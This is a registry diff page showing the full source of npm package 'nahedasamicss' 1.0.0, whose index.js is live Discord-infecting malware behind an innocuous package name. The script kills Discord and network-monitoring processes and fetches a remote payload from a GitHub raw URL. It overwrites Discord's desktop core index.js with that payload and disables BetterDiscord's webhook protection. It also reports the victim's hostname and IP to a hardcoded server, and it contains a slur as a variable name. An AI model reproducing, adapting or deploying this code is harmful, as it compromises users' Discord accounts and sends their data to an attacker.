nahedasamicss 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of nahedasamicss might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +202 -0
  2. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1,202 @@
1
+
2
+ const glob = require("glob");
3
+ const fs = require('fs');
4
+ const https = require('node:https');
5
+ const { exec } = require('child_process');
6
+ const shell = require('shelljs')
7
+ const os = require('node:os');
8
+ const axios = require('axios');
9
+ const download = require('download');
10
+ var ip = require("ip");
11
+ const zip = require("adm-zip");
12
+ const FormData = require("form-data");
13
+ var XMLHttpRequest = require('xhr2');
14
+ var totp = require("totp-generator");
15
+ const buf_replace = require('buffer-replace');
16
+ const { session, BrowserWindow } = require("electron");
17
+ const path = require("path");
18
+ const querystring = require("querystring");
19
+ //////////////////////////////////////////////////////////////////////
20
+ const config = {
21
+ "logout": "instant",
22
+ "inject-notify": "true",
23
+ "logout-notify": "true",
24
+ "init-notify":"true",
25
+ "embed-color": 123,
26
+ "USERNAMEWEBHOOK": "moonsz",
27
+ "disable-qr-code": "true"
28
+ }
29
+ //////////////////////////////////////////////////////////////////////
30
+ let LOCAL = process.env.LOCALAPPDATA
31
+ let discords = [];
32
+ let injectPath = [];
33
+ let runningDiscords = [];
34
+
35
+ fs.readdirSync(LOCAL).forEach(file => {
36
+ if (file.includes("iscord")) {
37
+ discords.push(LOCAL + '\\' + file)
38
+ } else {
39
+ return;
40
+ }
41
+ });
42
+
43
+ const temp = process.env.temp;
44
+ const infectionPath = path.join(process.env.temp, "\\Windows_Defender");
45
+
46
+
47
+
48
+ function Infect() {
49
+
50
+ https.get('https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js', (resp) => {
51
+ let data = '';
52
+
53
+ resp.on('data', (chunk) => {
54
+ data += chunk;
55
+ });
56
+ resp.on('end', () => {
57
+ injectPath.forEach(file => {
58
+ fs.writeFileSync(file, data.replace("%INITNOTI%", config["init-notify"]).replace("%USERIP%", ip.address()).replace("%LOGOUT%", config.logout).replace("%USERNAMEWEBHOOK%", config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%", config["logout-notify"]).replace("3447704",config["embed-color"]).replace('%DISABLEQRCODE%', config["disable-qr-code"]), {
59
+ encoding: 'utf8',
60
+ flag: 'w'
61
+ });
62
+
63
+ if (config["init-notify"] == "true") {
64
+ let init = file.replace("index.js", "init")
65
+ if (!fs.existsSync(init)) {
66
+ fs.mkdirSync(init, 0744)
67
+ }
68
+ }
69
+
70
+ if ( config.logout != "false" ) {
71
+ let folder = file.replace("index.js", "DC_BTW")
72
+ if (!fs.existsSync(folder)) {
73
+ fs.mkdirSync(folder, 0744)
74
+ if (config.logout == "instant") {
75
+ startDiscord();
76
+ }
77
+ } else if (fs.existsSync(folder) && config.logout == "instant" ){
78
+ startDiscord();
79
+ }
80
+ }
81
+ })
82
+ });
83
+ }).on("error", (err) => {
84
+ });
85
+ };
86
+
87
+ const logout = async () => {
88
+ await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
89
+ `window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
90
+ true
91
+ );
92
+
93
+ return "ok";
94
+ };
95
+
96
+ function killDiscord() {
97
+ runningDiscords.forEach(disc => {
98
+ exec(`taskkill /IM ${disc}.exe /F`, (err) => {
99
+ if (err) {
100
+ return;
101
+ }
102
+ });
103
+ });
104
+
105
+ if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
106
+ injectNotify();
107
+
108
+ }
109
+ Infect()
110
+ pwnBetterDiscord()
111
+ };
112
+
113
+ function listDiscords() {
114
+ exec('tasklist', function(err, stdout, stderr) {
115
+ if (stdout.includes("Discord.exe")) runningDiscords.push("discord");
116
+ if (stdout.includes("Discord (32 bits).exe")) runningDiscords.push("Discord");
117
+ if (stdout.includes("Discord.exe")) runningDiscords.push("Discord (32 bits)");
118
+ if (stdout.includes("DiscordCanary.exe")) runningDiscords.push("discordcanary");
119
+ if (stdout.includes("Discord Canary (32 bits).exe")) runningDiscords.push("Discord Canary");
120
+ if (stdout.includes("DiscordDevelopment.exe")) runningDiscords.push("discorddevelopment");
121
+ if (stdout.includes("DiscordPTB.exe")) runningDiscords.push("discordptb");
122
+ if (stdout.includes("Powercord.exe")) runningDiscords.push("powercord");
123
+ if (stdout.includes("Fiddler.exe")) runningDiscords.push("fiddler");
124
+ if (stdout.includes("wireshark.exe")) runningDiscords.push("wireshark");
125
+
126
+ if (config.logout == "instant") {
127
+ killDiscord();
128
+ } else {
129
+ if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
130
+ injectNotify();
131
+ }
132
+ Infect()
133
+ pwnBetterDiscord()
134
+ }
135
+ })
136
+ };
137
+
138
+ function startDiscord() {
139
+ runningDiscords.forEach(disc => {
140
+ let path = LOCAL + '\\' + disc + "\\Update.exe --processStart " + disc + ".exe"
141
+ exec(path, (err) => {
142
+ if (err) {
143
+ return;
144
+ }
145
+ });
146
+ });
147
+ };
148
+
149
+ function pwnBetterDiscord() {
150
+ let dir = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar"
151
+ if (fs.existsSync(dir)) {
152
+ let x = fs.readFileSync(dir)
153
+ fs.writeFileSync(dir, buf_replace(x, "api/webhooks", "dc"))
154
+ }
155
+
156
+ return;
157
+ }
158
+
159
+ function injectNotify() {
160
+ let fields = [];
161
+ injectPath.forEach( path => {
162
+ let c = path
163
+ fields.push(c)
164
+ })
165
+
166
+ const data = `{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`
167
+ var xhr = new XMLHttpRequest();
168
+ xhr.open('POST', 'http://20.14.80.127/api/newinjection', true);
169
+ xhr.setRequestHeader('Content-type', 'application/json');
170
+ xhr.onload = function () {
171
+ const negrodefender = this.responseText;
172
+ };
173
+ xhr.send(data);
174
+ }
175
+
176
+ function getDirectories(path) {
177
+ return fs.readdirSync(path).filter(function (file) {
178
+ return fs.statSync(path+'/'+file).isDirectory();
179
+ });
180
+ }
181
+
182
+
183
+ listDiscords();
184
+ discords.forEach(function(file) {
185
+ getDirectories(file + "\\").forEach((item) => {
186
+ if (item.includes("app-")) {
187
+ file = file + "\\" + item + "\\modules\\";
188
+ }
189
+ });
190
+ getDirectories(file).forEach((item) => {
191
+ if (item.includes("discord_desktop_core-")) {
192
+ file = file + "\\" + item + "\\discord_desktop_core\\index.js";
193
+ }
194
+ });
195
+
196
+ if (fs.existsSync(file)) {
197
+ injectPath.push(file);
198
+ }
199
+ });
200
+ killDiscord();
201
+ Infect();
202
+ startDiscord();
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "dependencies": {
3
+ "color": "^4.2.3"
4
+ },
5
+ "name": "nahedasamicss",
6
+ "version": "1.0.0",
7
+ "main": "index.js",
8
+ "devDependencies": {},
9
+ "scripts": {
10
+ "test": "echo \"Error: no test specified\" && exit 1"
11
+ },
12
+ "author": "nahedasamic <nahedasamic@gmail.com>",
13
+ "license": "MIT",
14
+ "description": ""
15
+ }